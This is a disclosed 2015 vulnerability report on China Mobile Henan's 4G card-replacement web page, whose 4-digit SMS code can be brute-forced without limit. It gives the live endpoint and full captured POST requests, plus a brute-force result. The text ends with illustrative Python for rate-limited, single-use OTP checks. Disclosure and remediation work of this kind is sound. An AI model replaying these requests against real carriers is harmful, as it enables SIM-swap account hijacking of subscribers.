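2015-01-29: Details reported to the vendor; awaiting vendor handling
2015-02-02: Vendor confirmed; details disclosed to the vendor only
2015-02-12: Details disclosed to core white hats and experts in related fields
2015-02-22: Details disclosed to regular white hats
2015-03-04: Details disclosed to intern white hats
2015-03-15: Details disclosed to the public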
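Weak dynamic password on a Chinese provincial China Mobile 4G self-service upgrade page (may enable SIM-replacement attacks)
Henan Mobile online store, 4G card replacement
http://ha.10086.cn/mshop/phonenum/v6phonenum!changeCardByValidateCode.action
Open it in WeChat or in a mobile browser
China Mobile Henan 10086 WeChat account
Free 4G card swap: enter a phone number and capture the request, shown below. Requests can be sent without limit, and the verification code is only 4 digits, so it can be brute-forced.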
POST /mshop/phonenum/v6phonenum!changeCardByValidateCode.action HTTP/1.1
Accept-Language: zh-CN
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Referer: http://ha.10086.cn/mshop/phonenum/v6phonenum!cardchange.action
User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.2; zh-cn; GT-I9100 Build/JZO54K) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025410 Mobile Safari/533.1 MicroMessenger/6.1.0.56_r1021013.540 NetType/WIFI
Origin: http://ha.10086.cn
Accept: application/vnd.wap.xhtml+xml, text/vnd.wap.wml, application/xhtml+xml, text/html, image/png, image/jpeg, image/gif, */*;q=0.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Proxy-Connection: keep-alive
Host: ha.10086.cn
Cookie: xXXXXX
Content-Length: 69

mealId=4437606&payType=2&special4g=1&phoneNo=手机号码&messageCode=
Try entering a verification code
Capture the request and brute-force the code
POST /mshop/phonenum/v6phonenum!changeCardByValidateCode.action HTTP/1.1
Accept-Language: zh-CN
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
Referer: http://ha.10086.cn/mshop/phonenum/v6phonenum!changeCardByValidateCode.action
User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.2; zh-cn; GT-I9100 Build/JZO54K) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025410 Mobile Safari/533.1 MicroMessenger/6.1.0.56_r1021013.540 NetType/WIFI
Origin: http://ha.10086.cn
Accept: application/vnd.wap.xhtml+xml, text/vnd.wap.wml, application/xhtml+xml, text/html, image/png, image/jpeg, image/gif, */*;q=0.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Proxy-Connection: keep-alive
Host: ha.10086.cn
Cookie: XXXXXX
Content-Length: 73

mealId=4437606&payType=2&special4g=1&phoneNo=XXXXX&messageCode=5555
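The brute-force run shows the verification code is 4444
(PS: the "verification code incorrect" message shown is the error that appeared when 5555 was entered.) Then click "I want to replace my card now" and fill in the order
The order can also be viewed afterwards; that is not demonstrated here
Severity: High
Vulnerability Rank: 13
Confirmed: 2015-02-02 13:38
CNVD confirmed the situation described and has passed it to CNCERT to notify China Mobile.
None yet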
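The flaw reported above is a 4-digit SMS code that the server lets a client guess without limit. The following is an added example of server-side verification that closes that gap; it is not code from the original report or from the vendor, and the class name, constants and sample phone identifier are assumptions chosen for illustration.

```python
import hmac
import secrets
import time

CODE_DIGITS = 6     # assumption: 10**6 code space instead of the 10**4 in the report
MAX_ATTEMPTS = 5    # assumption: wrong guesses allowed per issued code
TTL_SECONDS = 300   # assumption: code lifetime


class OtpStore:
    """In-memory store for illustration; production would use a shared cache."""

    def __init__(self, clock=time.monotonic):
        self._clock = clock
        self._codes = {}  # phone -> [code, expires_at, failed_attempts]

    def issue(self, phone):
        """Create a fresh code for phone, replacing any earlier one."""
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._codes[phone] = [code, self._clock() + TTL_SECONDS, 0]
        return code  # goes to the SMS gateway only, never into an HTTP response

    def verify(self, phone, guess):
        """Return 'ok', 'wrong', 'locked' or 'expired'."""
        entry = self._codes.get(phone)
        if entry is None:
            return "expired"
        code, expires_at, _ = entry
        if self._clock() >= expires_at:
            del self._codes[phone]
            return "expired"
        if hmac.compare_digest(code.encode(), str(guess).encode()):
            del self._codes[phone]  # single use
            return "ok"
        entry[2] += 1
        if entry[2] >= MAX_ATTEMPTS:
            del self._codes[phone]  # burn the code; a new one must be requested
            return "locked"
        return "wrong"


def demo():
    """Constructed run: wrong guesses burn the code before it can be found."""
    store = OtpStore()
    code = store.issue("example-number")  # constructed sample identifier
    wrong = [f"{(int(code) + i) % 10 ** CODE_DIGITS:0{CODE_DIGITS}d}" for i in range(1, 6)]
    results = [store.verify("example-number", g) for g in wrong]
    return results + [store.verify("example-number", code)]
```

Issuance needs its own per-number rate limit as well, otherwise every re-issued code grants another five guesses.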